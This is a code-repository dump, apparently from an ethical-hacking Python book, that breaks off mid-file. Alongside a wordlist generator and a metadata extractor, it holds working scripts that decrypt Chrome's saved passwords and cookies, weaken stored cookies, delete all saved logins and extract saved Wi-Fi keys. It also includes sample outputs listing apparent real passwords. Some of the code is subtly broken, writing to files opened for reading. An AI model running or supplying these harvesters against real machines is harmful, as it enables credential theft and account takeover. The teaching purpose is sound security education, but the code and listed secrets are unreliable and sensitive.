271 | auua 272 | auue 273 | auui 274 | auuo 275 | auuu 276 | eaaa 277 | eaae 278 | eaai 279 | eaao 280 | eaau 281 | eaea 282 | eaee 283 | eaei 284 | eaeo 285 | eaeu 286 | eaia 287 | eaie 288 | eaii 289 | eaio 290 | eaiu 291 | eaoa 292 | eaoe 293 | eaoi 294 | eaoo 295 | eaou 296 | eaua 297 | eaue 298 | eaui 299 | eauo 300 | eauu 301 | eeaa 302 | eeae 303 | eeai 304 | eeao 305 | eeau 306 | eeea 307 | eeee 308 | eeei 309 | eeeo 310 | eeeu 311 | eeia 312 | eeie 313 | eeii 314 | eeio 315 | eeiu 316 | eeoa 317 | eeoe 318 | eeoi 319 | eeoo 320 | eeou 321 | eeua 322 | eeue 323 | eeui 324 | eeuo 325 | eeuu 326 | eiaa 327 | eiae 328 | eiai 329 | eiao 330 | eiau 331 | eiea 332 | eiee 333 | eiei 334 | eieo 335 | eieu 336 | eiia 337 | eiie 338 | eiii 339 | eiio 340 | eiiu 341 | eioa 342 | eioe 343 | eioi 344 | eioo 345 | eiou 346 | eiua 347 | eiue 348 | eiui 349 | eiuo 350 | eiuu 351 | eoaa 352 | eoae 353 | eoai 354 | eoao 355 | eoau 356 | eoea 357 | eoee 358 | eoei 359 | eoeo 360 | eoeu 361 | eoia 362 | eoie 363 | eoii 364 | eoio 365 | eoiu 366 | eooa 367 | eooe 368 | eooi 369 | eooo 370 | eoou 371 | eoua 372 | eoue 373 | eoui 374 | eouo 375 | eouu 376 | euaa 377 | euae 378 | euai 379 | euao 380 | euau 381 | euea 382 | euee 383 | euei 384 | eueo 385 | eueu 386 | euia 387 | euie 388 | euii 389 | euio 390 | euiu 391 | euoa 392 | euoe 393 | euoi 394 | euoo 395 | euou 396 | euua 397 | euue 398 | euui 399 | euuo 400 | euuu 401 | iaaa 402 | iaae 403 | iaai 404 | iaao 405 | iaau 406 | iaea 407 | iaee 408 | iaei 409 | iaeo 410 | iaeu 411 | iaia 412 | iaie 413 | iaii 414 | iaio 415 | iaiu 416 | iaoa 417 | iaoe 418 | iaoi 419 | iaoo 420 | iaou 421 | iaua 422 | iaue 423 | iaui 424 | iauo 425 | iauu 426 | ieaa 427 | ieae 428 | ieai 429 | ieao 430 | ieau 431 | ieea 432 | ieee 433 | ieei 434 | ieeo 435 | ieeu 436 | ieia 437 | ieie 438 | ieii 439 | ieio 440 | ieiu 441 | ieoa 442 | ieoe 443 | ieoi 444 | ieoo 445 | ieou 446 | ieua 447 | ieue 448 | ieui 449 | ieuo 450 | ieuu 451 | iiaa 452 | iiae 453 | iiai 454 | iiao 455 | iiau 456 | iiea 457 | iiee 458 | iiei 459 | iieo 460 | iieu 461 | iiia 462 | iiie 463 | iiii 464 | iiio 465 | iiiu 466 | iioa 467 | iioe 468 | iioi 469 | iioo 470 | iiou 471 | iiua 472 | iiue 473 | iiui 474 | iiuo 475 | iiuu 476 | ioaa 477 | ioae 478 | ioai 479 | ioao 480 | ioau 481 | ioea 482 | ioee 483 | ioei 484 | ioeo 485 | ioeu 486 | ioia 487 | ioie 488 | ioii 489 | ioio 490 | ioiu 491 | iooa 492 | iooe 493 | iooi 494 | iooo 495 | ioou 496 | ioua 497 | ioue 498 | ioui 499 | iouo 500 | iouu 501 | iuaa 502 | iuae 503 | iuai 504 | iuao 505 | iuau 506 | iuea 507 | iuee 508 | iuei 509 | iueo 510 | iueu 511 | iuia 512 | iuie 513 | iuii 514 | iuio 515 | iuiu 516 | iuoa 517 | iuoe 518 | iuoi 519 | iuoo 520 | iuou 521 | iuua 522 | iuue 523 | iuui 524 | iuuo 525 | iuuu 526 | oaaa 527 | oaae 528 | oaai 529 | oaao 530 | oaau 531 | oaea 532 | oaee 533 | oaei 534 | oaeo 535 | oaeu 536 | oaia 537 | oaie 538 | oaii 539 | oaio 540 | oaiu 541 | oaoa 542 | oaoe 543 | oaoi 544 | oaoo 545 | oaou 546 | oaua 547 | oaue 548 | oaui 549 | oauo 550 | oauu 551 | oeaa 552 | oeae 553 | oeai 554 | oeao 555 | oeau 556 | oeea 557 | oeee 558 | oeei 559 | oeeo 560 | oeeu 561 | oeia 562 | oeie 563 | oeii 564 | oeio 565 | oeiu 566 | oeoa 567 | oeoe 568 | oeoi 569 | oeoo 570 | oeou 571 | oeua 572 | oeue 573 | oeui 574 | oeuo 575 | oeuu 576 | oiaa 577 | oiae 578 | oiai 579 | oiao 580 | oiau 581 | oiea 582 | oiee 583 | oiei 584 | oieo 585 | oieu 586 | oiia 587 | oiie 588 | oiii 589 | oiio 590 | oiiu 591 | oioa 592 | oioe 593 | oioi 594 | oioo 595 | oiou 596 | oiua 597 | oiue 598 | oiui 599 | oiuo 600 | oiuu 601 | ooaa 602 | ooae 603 | ooai 604 | ooao 605 | ooau 606 | ooea 607 | ooee 608 | ooei 609 | ooeo 610 | ooeu 611 | ooia 612 | ooie 613 | ooii 614 | ooio 615 | ooiu 616 | oooa 617 | oooe 618 | oooi 619 | oooo 620 | ooou 621 | ooua 622 | ooue 623 | ooui 624 | oouo 625 | oouu 626 | ouaa 627 | ouae 628 | ouai 629 | ouao 630 | ouau 631 | ouea 632 | ouee 633 | ouei 634 | oueo 635 | oueu 636 | ouia 637 | ouie 638 | ouii 639 | ouio 640 | ouiu 641 | ouoa 642 | ouoe 643 | ouoi 644 | ouoo 645 | ouou 646 | ouua 647 | ouue 648 | ouui 649 | ouuo 650 | ouuu 651 | uaaa 652 | uaae 653 | uaai 654 | uaao 655 | uaau 656 | uaea 657 | uaee 658 | uaei 659 | uaeo 660 | uaeu 661 | uaia 662 | uaie 663 | uaii 664 | uaio 665 | uaiu 666 | uaoa 667 | uaoe 668 | uaoi 669 | uaoo 670 | uaou 671 | uaua 672 | uaue 673 | uaui 674 | uauo 675 | uauu 676 | ueaa 677 | ueae 678 | ueai 679 | ueao 680 | ueau 681 | ueea 682 | ueee 683 | ueei 684 | ueeo 685 | ueeu 686 | ueia 687 | ueie 688 | ueii 689 | ueio 690 | ueiu 691 | ueoa 692 | ueoe 693 | ueoi 694 | ueoo 695 | ueou 696 | ueua 697 | ueue 698 | ueui 699 | ueuo 700 | ueuu 701 | uiaa 702 | uiae 703 | uiai 704 | uiao 705 | uiau 706 | uiea 707 | uiee 708 | uiei 709 | uieo 710 | uieu 711 | uiia 712 | uiie 713 | uiii 714 | uiio 715 | uiiu 716 | uioa 717 | uioe 718 | uioi 719 | uioo 720 | uiou 721 | uiua 722 | uiue 723 | uiui 724 | uiuo 725 | uiuu 726 | uoaa 727 | uoae 728 | uoai 729 | uoao 730 | uoau 731 | uoea 732 | uoee 733 | uoei 734 | uoeo 735 | uoeu 736 | uoia 737 | uoie 738 | uoii 739 | uoio 740 | uoiu 741 | uooa 742 | uooe 743 | uooi 744 | uooo 745 | uoou 746 | uoua 747 | uoue 748 | uoui 749 | uouo 750 | uouu 751 | uuaa 752 | uuae 753 | uuai 754 | uuao 755 | uuau 756 | uuea 757 | uuee 758 | uuei 759 | uueo 760 | uueu 761 | uuia 762 | uuie 763 | uuii 764 | uuio 765 | uuiu 766 | uuoa 767 | uuoe 768 | uuoi 769 | uuoo 770 | uuou 771 | uuua 772 | uuue 773 | uuui 774 | uuuo 775 | uuuu 776 | -------------------------------------------------------------------------------- /chapter-3/wordlist-generator/wordlist_generator.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import itertools 3 | import string 4 | import time 5 | import sys 6 | from typing import Iterator 7 | 8 | class WordlistGenerator: 9 | """ 10 | A flexible and sophisticated word list generator. 11 | """ 12 | def __init__(self): 13 | self.charset = "" 14 | self.min_length = 1 15 | self.max_length = 8 16 | self.pattern = None 17 | self.output_file = None 18 | 19 | def generate_wordlist(self) -> Iterator[str]: 20 | """ 21 | Generate the word list based on the specified parameters. 22 | 23 | Returns: 24 | Iterator[str]: An iterator of generated words. 25 | """ 26 | if self.pattern: 27 | yield from self._generate_with_pattern() 28 | else: 29 | yield from self._generate_without_pattern() 30 | 31 | def _generate_with_pattern(self) -> Iterator[str]: 32 | """ 33 | Generate words based on a specified pattern. 34 | 35 | Returns: 36 | Iterator[str]: An iterator of generated words matching the pattern. 37 | """ 38 | pattern_chars = list(self.pattern) 39 | for i, char in enumerate(pattern_chars): 40 | if char == '@': 41 | pattern_chars[i] = string.ascii_lowercase 42 | elif char == ',': 43 | pattern_chars[i] = string.ascii_uppercase 44 | elif char == '%': 45 | pattern_chars[i] = string.digits 46 | elif char == '^': 47 | pattern_chars[i] = string.punctuation 48 | 49 | for word in itertools.product(*pattern_chars): 50 | yield ''.join(word) 51 | 52 | def _generate_without_pattern(self) -> Iterator[str]: 53 | """ 54 | Generate words without a specific pattern. 55 | 56 | Returns: 57 | Iterator[str]: An iterator of generated words. 58 | """ 59 | for length in range(self.min_length, self.max_length + 1): 60 | for word in itertools.product(self.charset, repeat=length): 61 | yield ''.join(word) 62 | 63 | def parse_arguments() -> argparse.Namespace: 64 | """ 65 | Parse command-line arguments. 66 | 67 | Returns: 68 | argparse.Namespace: Parsed arguments. 69 | """ 70 | parser = argparse.ArgumentParser(description="Sophisticated Word List Generator") 71 | parser.add_argument("-c", "--charset", type=str, help="Custom character set") 72 | parser.add_argument("-m", "--min", type=int, default=1, help="Minimum word length") 73 | parser.add_argument("-M", "--max", type=int, default=8, help="Maximum word length") 74 | parser.add_argument("-p", "--pattern", type=str, help="Pattern for word generation") 75 | parser.add_argument("-o", "--output", type=str, help="Output file") 76 | parser.add_argument("-l", "--lowercase", action="store_true", help="Include lowercase letters") 77 | parser.add_argument("-u", "--uppercase", action="store_true", help="Include uppercase letters") 78 | parser.add_argument("-d", "--digits", action="store_true", help="Include digits") 79 | parser.add_argument("-s", "--special", action="store_true", help="Include special characters") 80 | 81 | return parser.parse_args() 82 | 83 | def main(): 84 | """ 85 | Main function to run the word list generator. 86 | """ 87 | args = parse_arguments() 88 | generator = WordlistGenerator() 89 | 90 | # Set up pattern 91 | generator.pattern = args.pattern 92 | # Set up character set 93 | if args.charset: 94 | generator.charset = args.charset 95 | else: 96 | if args.lowercase: 97 | generator.charset += string.ascii_lowercase 98 | if args.uppercase: 99 | generator.charset += string.ascii_uppercase 100 | if args.digits: 101 | generator.charset += string.digits 102 | if args.special: 103 | generator.charset += string.punctuation 104 | 105 | if not generator.charset and generator.pattern is None: 106 | print("[!] Error: No character set specified or pattern not provided. Use -h for help.") 107 | sys.exit(1) 108 | 109 | # Set up other parameters 110 | generator.min_length = args.min 111 | generator.max_length = args.max 112 | generator.output_file = args.output 113 | 114 | # Generate and output words 115 | output = open(generator.output_file, 'w') if generator.output_file else sys.stdout 116 | t = time.time() 117 | try: 118 | for word in generator.generate_wordlist(): 119 | print(word, file=output) 120 | finally: 121 | if output != sys.stdout: 122 | output.close() 123 | if generator.output_file: 124 | print(f"[+] Word list saved to {generator.output_file}.") 125 | print(f"[+] Word list generated in {time.time() - t:.2f} seconds.") 126 | n_words = open(generator.output_file).read().count('\n') 127 | print(f"[+] Total words generated: {n_words}") 128 | 129 | if __name__ == "__main__": 130 | main() 131 | -------------------------------------------------------------------------------- /chapter-4/extract-chrome-data/chrome_cookie.py: -------------------------------------------------------------------------------- 1 | import os 2 | import json 3 | import base64 4 | import sqlite3 5 | import shutil 6 | from datetime import datetime, timedelta 7 | import win32crypt # pip install pypiwin32 8 | from Crypto.Cipher import AES # pip install pycryptodome 9 | import sys 10 | 11 | def get_chrome_datetime(chromedate): 12 | """Return a `datetime.datetime` object from a chrome format datetime 13 | Since `chromedate` is formatted as the number of microseconds since January, 1601""" 14 | if chromedate != 86400000000 and chromedate: 15 | try: 16 | return datetime(1601, 1, 1) + timedelta(microseconds=chromedate) 17 | except Exception as e: 18 | print(f"Error: {e}, chromedate: {chromedate}") 19 | return chromedate 20 | else: 21 | return "" 22 | 23 | 24 | def get_encryption_key(): 25 | local_state_path = os.path.join(os.environ["USERPROFILE"], 26 | "AppData", "Local", "Google", "Chrome", 27 | "User Data", "Local State") 28 | with open(local_state_path, "r", encoding="utf-8") as f: 29 | local_state = f.read() 30 | local_state = json.loads(local_state) 31 | 32 | # decode the encryption key from Base64 33 | key = base64.b64decode(local_state["os_crypt"]["encrypted_key"]) 34 | # remove 'DPAPI' str 35 | key = key[5:] 36 | # return decrypted key that was originally encrypted 37 | # using a session key derived from current user's logon credentials 38 | # doc: http://timgolden.me.uk/pywin32-docs/win32crypt.html 39 | return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] 40 | 41 | 42 | def decrypt_data(data, key): 43 | try: 44 | # get the initialization vector 45 | iv = data[3:15] 46 | data = data[15:] 47 | # generate cipher 48 | cipher = AES.new(key, AES.MODE_GCM, iv) 49 | # decrypt password 50 | return cipher.decrypt(data)[:-16].decode() 51 | except: 52 | try: 53 | return str(win32crypt.CryptUnprotectData(data, None, None, None, 0)[1]) 54 | except: 55 | # not supported 56 | return "" 57 | 58 | 59 | def main(output_file): 60 | # local sqlite Chrome cookie database path 61 | db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", 62 | "Google", "Chrome", "User Data", "Default", "Network", "Cookies") 63 | # copy the file to current directory 64 | # as the database will be locked if chrome is currently open 65 | filename = "Cookies.db" 66 | if not os.path.isfile(filename): 67 | # copy file when does not exist in the current directory 68 | shutil.copyfile(db_path, filename) 69 | # connect to the database 70 | db = sqlite3.connect(filename) 71 | # ignore decoding errors 72 | db.text_factory = lambda b: b.decode(errors="ignore") 73 | cursor = db.cursor() 74 | # get the cookies from `cookies` table 75 | cursor.execute(""" 76 | SELECT host_key, name, value, creation_utc, last_access_utc, expires_utc, encrypted_value 77 | FROM cookies""") 78 | # you can also search by domain, e.g thepythoncode.com 79 | # cursor.execute(""" 80 | # SELECT host_key, name, value, creation_utc, last_access_utc, expires_utc, encrypted_value 81 | # FROM cookies 82 | # WHERE host_key like '%thepythoncode.com%'""") 83 | # get the AES key 84 | key = get_encryption_key() 85 | for host_key, name, value, creation_utc, last_access_utc, expires_utc, encrypted_value in cursor.fetchall(): 86 | if not value: 87 | decrypted_value = decrypt_data(encrypted_value, key) 88 | else: 89 | # already decrypted 90 | decrypted_value = value 91 | with open(output_file) as f: 92 | print(f""" 93 | Host: {host_key} 94 | Cookie name: {name} 95 | Cookie value (decrypted): {decrypted_value} 96 | Creation datetime (UTC): {get_chrome_datetime(creation_utc)} 97 | Last access datetime (UTC): {get_chrome_datetime(last_access_utc)} 98 | Expires datetime (UTC): {get_chrome_datetime(expires_utc)} 99 | ===============================================================""", file=f) 100 | # update the cookies table with the decrypted value 101 | # and make session cookie persistent 102 | cursor.execute(""" 103 | UPDATE cookies SET value = ?, has_expires = 1, expires_utc = 99999999999999999, is_persistent = 1, is_secure = 0 104 | WHERE host_key = ? 105 | AND name = ?""", (decrypted_value, host_key, name)) 106 | # commit changes 107 | db.commit() 108 | # close connection 109 | db.close() 110 | try: 111 | # try to remove the copied db file 112 | os.remove(filename) 113 | except: 114 | pass 115 | 116 | 117 | if __name__ == "__main__": 118 | output_file = sys.argv[1] 119 | main(output_file) -------------------------------------------------------------------------------- /chapter-4/extract-chrome-data/chromepass.py: -------------------------------------------------------------------------------- 1 | import os 2 | import json 3 | import base64 4 | import sqlite3 5 | import win32crypt 6 | from Crypto.Cipher import AES 7 | import shutil 8 | from datetime import datetime, timedelta 9 | import sys 10 | 11 | def get_chrome_datetime(chromedate): 12 | """Return a `datetime.datetime` object from a chrome format datetime 13 | Since `chromedate` is formatted as the number of microseconds since January, 1601""" 14 | return datetime(1601, 1, 1) + timedelta(microseconds=chromedate) 15 | 16 | def get_encryption_key(): 17 | local_state_path = os.path.join(os.environ["USERPROFILE"], 18 | "AppData", "Local", "Google", "Chrome", 19 | "User Data", "Local State") 20 | with open(local_state_path, "r", encoding="utf-8") as f: 21 | local_state = f.read() 22 | local_state = json.loads(local_state) 23 | 24 | # decode the encryption key from Base64 25 | key = base64.b64decode(local_state["os_crypt"]["encrypted_key"]) 26 | # remove DPAPI str 27 | key = key[5:] 28 | # return decrypted key that was originally encrypted 29 | # using a session key derived from current user's logon credentials 30 | # doc: http://timgolden.me.uk/pywin32-docs/win32crypt.html 31 | return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] 32 | 33 | 34 | def decrypt_password(password, key): 35 | try: 36 | # get the initialization vector 37 | iv = password[3:15] 38 | password = password[15:] 39 | # generate cipher 40 | cipher = AES.new(key, AES.MODE_GCM, iv) 41 | # decrypt password 42 | return cipher.decrypt(password)[:-16].decode() 43 | except: 44 | try: 45 | return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1]) 46 | except: 47 | # not supported 48 | return "" 49 | 50 | 51 | def main(output_file): 52 | # get the AES key 53 | key = get_encryption_key() 54 | # local sqlite Chrome database path 55 | db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", 56 | "Google", "Chrome", "User Data", "default", "Login Data") 57 | # copy the file to another location 58 | # as the database will be locked if chrome is currently running 59 | filename = "ChromeData.db" 60 | shutil.copyfile(db_path, filename) 61 | # connect to the database 62 | db = sqlite3.connect(filename) 63 | cursor = db.cursor() 64 | # `logins` table has the data we need 65 | cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created") 66 | # iterate over all rows 67 | for row in cursor.fetchall(): 68 | origin_url = row[0] 69 | action_url = row[1] 70 | username = row[2] 71 | password = decrypt_password(row[3], key) 72 | date_created = row[4] 73 | date_last_used = row[5] 74 | if username or password: 75 | with open(output_file) as f: 76 | print(f"Origin URL: {origin_url}", file=f) 77 | print(f"Action URL: {action_url}", file=f) 78 | print(f"Username: {username}", file=f) 79 | print(f"Password: {password}", file=f) 80 | else: 81 | continue 82 | if date_created != 86400000000 and date_created: 83 | print(f"Creation date: {str(get_chrome_datetime(date_created))}", file=f) 84 | if date_last_used != 86400000000 and date_last_used: 85 | print(f"Last Used: {str(get_chrome_datetime(date_last_used))}", file=f) 86 | print("="*50, file=f) 87 | cursor.close() 88 | db.close() 89 | try: 90 | # try to remove the copied db file 91 | os.remove(filename) 92 | except: 93 | pass 94 | 95 | 96 | if __name__ == "__main__": 97 | output_file = sys.argv[1] 98 | main(output_file) -------------------------------------------------------------------------------- /chapter-4/extract-chrome-data/credentials.txt: -------------------------------------------------------------------------------- 1 | Origin URL: https://accounts.google.com/SignUp 2 | Action URL: ttps://accounts.google.com/SignUp 3 | Username: email@gmail.com 4 | Password: rU91aQkt0uqVzeq 5 | Creation date: 2022-05-25 07:50:41.416711 6 | Last Used: 2022-05-25 07:50:41.416711 7 | ================================================== 8 | Origin URL: https://cutt.ly/register 9 | Action URL: https://cutt.ly/register 10 | Username: email@example.com 11 | Password: AfE9P206f5U 12 | Creation date: 2022-07-13 08:31:25.142499 13 | Last Used: 2022-07-13 09:46:24.375584 14 | ================================================== -------------------------------------------------------------------------------- /chapter-4/extract-chrome-data/deletepass.py: -------------------------------------------------------------------------------- 1 | import sqlite3 2 | import os 3 | 4 | db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", 5 | "Google", "Chrome", "User Data", "default", "Login Data") 6 | db = sqlite3.connect(db_path) 7 | cursor = db.cursor() 8 | # `logins` table has the data we need 9 | cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created") 10 | n_logins = len(cursor.fetchall()) 11 | print(f"Deleting a total of {n_logins} logins...") 12 | cursor.execute("delete from logins") 13 | cursor.connection.commit() -------------------------------------------------------------------------------- /chapter-4/extract-chrome-data/requirements.txt: -------------------------------------------------------------------------------- 1 | pycryptodome 2 | pypiwin32 -------------------------------------------------------------------------------- /chapter-4/extract-metadata-from-files/files/cleaned_example.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-4/extract-metadata-from-files/files/cleaned_example.docx -------------------------------------------------------------------------------- /chapter-4/extract-metadata-from-files/files/cleaned_example.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-4/extract-metadata-from-files/files/cleaned_example.pdf -------------------------------------------------------------------------------- /chapter-4/extract-metadata-from-files/files/cleaned_image.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-4/extract-metadata-from-files/files/cleaned_image.jpg -------------------------------------------------------------------------------- /chapter-4/extract-metadata-from-files/files/example.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-4/extract-metadata-from-files/files/example.docx -------------------------------------------------------------------------------- /chapter-4/extract-metadata-from-files/files/example.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-4/extract-metadata-from-files/files/example.pdf -------------------------------------------------------------------------------- /chapter-4/extract-metadata-from-files/files/image.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-4/extract-metadata-from-files/files/image.jpg -------------------------------------------------------------------------------- /chapter-4/extract-metadata-from-files/metadata.py: -------------------------------------------------------------------------------- 1 | import ffmpeg 2 | from tinytag import TinyTag 3 | import sys 4 | from pprint import pprint # for printing Python dictionaries in a human-readable way 5 | from PIL import Image 6 | from PIL.ExifTags import TAGS 7 | import sys 8 | import pikepdf 9 | from docx import Document 10 | 11 | 12 | def get_media_metadata(media_file): 13 | # uses ffprobe command to extract all possible metadata from the media file 14 | ffmpeg_data = ffmpeg.probe(media_file)["streams"][0] 15 | tt_data = TinyTag.get(media_file).as_dict() 16 | # add both data to a single dict 17 | return {**tt_data, **ffmpeg_data} 18 | 19 | 20 | 21 | def get_image_metadata(image_file): 22 | # read the image data using PIL 23 | image = Image.open(image_file) 24 | # extract other basic metadata 25 | info_dict = { 26 | "Filename": image.filename, 27 | "Image Size": image.size, 28 | "Image Height": image.height, 29 | "Image Width": image.width, 30 | "Image Format": image.format, 31 | "Image Mode": image.mode, 32 | "Image is Animated": getattr(image, "is_animated", False), 33 | "Frames in Image": getattr(image, "n_frames", 1) 34 | } 35 | # extract EXIF data 36 | exifdata = image.getexif() 37 | # iterating over all EXIF data fields 38 | for tag_id in exifdata: 39 | # get the tag name, instead of human unreadable tag id 40 | tag = TAGS.get(tag_id, tag_id) 41 | data = exifdata.get(tag_id) 42 | # decode bytes 43 | if isinstance(data, bytes): 44 | data = data.decode() 45 | # print(f"{tag:25}: {data}") 46 | info_dict[tag] = data 47 | return info_dict 48 | 49 | 50 | def get_pdf_metadata(pdf_file): 51 | # read the pdf file 52 | pdf = pikepdf.Pdf.open(pdf_file) 53 | # .docinfo attribute contains all the metadata of 54 | # the PDF document 55 | return dict(pdf.docinfo) 56 | 57 | 58 | def get_docx_metadata(docx_file): 59 | """ 60 | Extracts metadata from a DOCX file. 61 | 62 | Args: 63 | docx_file (str): The path to the .docx file. 64 | 65 | Returns: 66 | dict: A dictionary containing metadata information. 67 | """ 68 | # Load the DOCX file 69 | doc = Document(docx_file) 70 | 71 | # Accessing document properties 72 | props = doc.core_properties 73 | return { 74 | "author": props.author, 75 | "category": props.category, 76 | "comments": props.comments, 77 | "content_status": props.content_status, 78 | "created": props.created, 79 | "identifier": props.identifier, 80 | "keywords": props.keywords, 81 | "language": props.language, 82 | "last_modified_by": props.last_modified_by, 83 | "last_printed": props.last_printed, 84 | "modified": props.modified, 85 | "revision": props.revision, 86 | "subject": props.subject, 87 | "title": props.title, 88 | "version": props.version 89 | } 90 | 91 | 92 | if __name__ == "__main__": 93 | file = sys.argv[1] 94 | if file.endswith(".pdf"): 95 | print(get_pdf_metadata(file)) 96 | elif file.endswith(".jpg"): 97 | pprint(get_image_metadata(file)) 98 | elif file.endswith(".docx"): 99 | pprint(get_docx_metadata(file)) 100 | else: 101 | pprint(get_media_metadata(file)) -------------------------------------------------------------------------------- /chapter-4/extract-metadata-from-files/requirements.txt: -------------------------------------------------------------------------------- 1 | ffmpeg-python 2 | Pillow 3 | pikepdf 4 | tinytag 5 | python-docx -------------------------------------------------------------------------------- /chapter-4/extract-wifi-passwords/extract_wifi_passwords.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import os 3 | import re 4 | from collections import namedtuple 5 | import configparser 6 | 7 | 8 | def get_windows_saved_ssids(): 9 | """Returns a list of saved SSIDs in a Windows machine using netsh command""" 10 | # get all saved profiles in the PC 11 | output = subprocess.check_output("netsh wlan show profiles").decode() 12 | ssids = [] 13 | profiles = re.findall(r"All User Profile\s(.*)", output) 14 | for profile in profiles: 15 | # for each SSID, remove spaces and colon 16 | ssid = profile.strip().strip(":").strip() 17 | # add to the list 18 | ssids.append(ssid) 19 | return ssids 20 | 21 | 22 | def get_windows_saved_wifi_passwords(verbose=1): 23 | """Extracts saved Wi-Fi passwords saved in a Windows machine, this function extracts data using netsh 24 | command in Windows 25 | Args: 26 | verbose (int, optional): whether to print saved profiles real-time. Defaults to 1. 27 | Returns: 28 | [list]: list of extracted profiles, a profile has the fields ["ssid", "ciphers", "key"] 29 | """ 30 | ssids = get_windows_saved_ssids() 31 | Profile = namedtuple("Profile", ["ssid", "ciphers", "key"]) 32 | profiles = [] 33 | for ssid in ssids: 34 | ssid_details = subprocess.check_output(f"""netsh wlan show profile "{ssid}" key=clear""").decode() 35 | # get the ciphers 36 | ciphers = re.findall(r"Cipher\s(.*)", ssid_details) 37 | # clear spaces and colon 38 | ciphers = "/".join([c.strip().strip(":").strip() for c in ciphers]) 39 | # get the Wi-Fi password 40 | key = re.findall(r"Key Content\s(.*)", ssid_details) 41 | # clear spaces and colon 42 | try: 43 | key = key[0].strip().strip(":").strip() 44 | except IndexError: 45 | key = "None" 46 | profile = Profile(ssid=ssid, ciphers=ciphers, key=key) 47 | if verbose >= 1: 48 | print_windows_profile(profile) 49 | profiles.append(profile) 50 | return profiles 51 | 52 | 53 | def print_windows_profile(profile): 54 | """Prints a single profile on Windows""" 55 | print(f"{profile.ssid:25}{profile.ciphers:15}{profile.key:50}") 56 | 57 | 58 | def print_windows_profiles(verbose): 59 | """Prints all extracted SSIDs along with Key on Windows""" 60 | print("SSID CIPHER(S) KEY") 61 | get_windows_saved_wifi_passwords(verbose) 62 | 63 | 64 | def get_linux_saved_wifi_passwords(verbose=1): 65 | """Extracts saved Wi-Fi passwords saved in a Linux machine, this function extracts data in the 66 | `/etc/NetworkManager/system-connections/` directory 67 | Args: 68 | verbose (int, optional): whether to print saved profiles real-time. Defaults to 1. 69 | Returns: 70 | [list]: list of extracted profiles, a profile has the fields ["ssid", "auth-alg", "key-mgmt", "psk"] 71 | """ 72 | network_connections_path = "/etc/NetworkManager/system-connections/" 73 | fields = ["ssid", "auth-alg", "key-mgmt", "psk"] 74 | Profile = namedtuple("Profile", [f.replace("-", "_") for f in fields]) 75 | profiles = [] 76 | for file in os.listdir(network_connections_path): 77 | data = { k.replace("-", "_"): None for k in fields } 78 | config = configparser.ConfigParser() 79 | config.read(os.path.join(network_connections_path, file)) 80 | for _, section in config.items(): 81 | for k, v in section.items(): 82 | if k in fields: 83 | data[k.replace("-", "_")] = v 84 | profile = Profile(**data) 85 | if verbose >= 1: 86 | print_linux_profile(profile) 87 | profiles.append(profile) 88 | return profiles 89 | 90 | 91 | def print_linux_profile(profile): 92 | """Prints a single profile on Linux""" 93 | print(f"{str(profile.ssid):25}{str(profile.auth_alg):5}{str(profile.key_mgmt):10}{str(profile.psk):50}") 94 | 95 | 96 | def print_linux_profiles(verbose): 97 | """Prints all extracted SSIDs along with Key (PSK) on Linux""" 98 | print("SSID AUTH KEY-MGMT PSK") 99 | get_linux_saved_wifi_passwords(verbose) 100 | 101 | 102 | def print_profiles(verbose=1): 103 | if os.name == "nt": 104 | print_windows_profiles(verbose) 105 | elif os.name == "posix": 106 | print_linux_profiles(verbose) 107 | else: 108 | raise NotImplemented("Code only works for either Linux or Windows") 109 | 110 | 111 | if __name__ == "__main__": 112 | print_profiles() -------------------------------------------------------------------------------- /chapter-4/extract-wifi-passwords/output.md: -------------------------------------------------------------------------------- 1 | On Windows: 2 | 3 | SSID CIPHER(S) KEY 4 | -------------------------------------------------- 5 | OPPO F9 CCMP/GCMP 0120123489@ 6 | TP-Link_83BE_5G CCMP/GCMP 0xxxxxxx 7 | Access Point CCMP/GCMP super123 8 | HUAWEI P30 CCMP/GCMP 00055511 9 | ACER CCMP/GCMP 20192019 10 | HOTEL VINCCI MARILLIA CCMP 01012019 11 | Bkvz-U01Hkkkkkzg CCMP/GCMP 00000011 12 | nadj CCMP/GCMP burger010 13 | Griffe T1 CCMP/GCMP 110011110111111 14 | BIBLIO02 None None 15 | AndroidAP CCMP/GCMP 185338019mbs 16 | ilfes TKIP 25252516 17 | Point CCMP/GCMP super123 18 | 19 | 20 | On Linux: 21 | 22 | SSID AUTH KEY-MGMT PSK 23 | -------------------------------------------------- 24 | KNDOMA open wpa-psk 5060012009690 25 | TP-LINK_C4973F None None None 26 | None None None None 27 | Point open wpa-psk super123 28 | Point None None None -------------------------------------------------------------------------------- /chapter-4/fake-data-generation/generate_fake_data.py: -------------------------------------------------------------------------------- 1 | from faker import Faker 2 | from pprint import pprint 3 | 4 | def generate_user_data(locale='en_US'): 5 | """ 6 | Generates fake user data. 7 | 8 | Args: 9 | locale (str): Locale code to generate data for specific regions. 10 | 11 | Returns: 12 | dict: A dictionary containing fake user details. 13 | """ 14 | fake = Faker(locale) 15 | user_data = { 16 | "name": fake.name(), 17 | "address": fake.address(), 18 | "email": fake.email(), 19 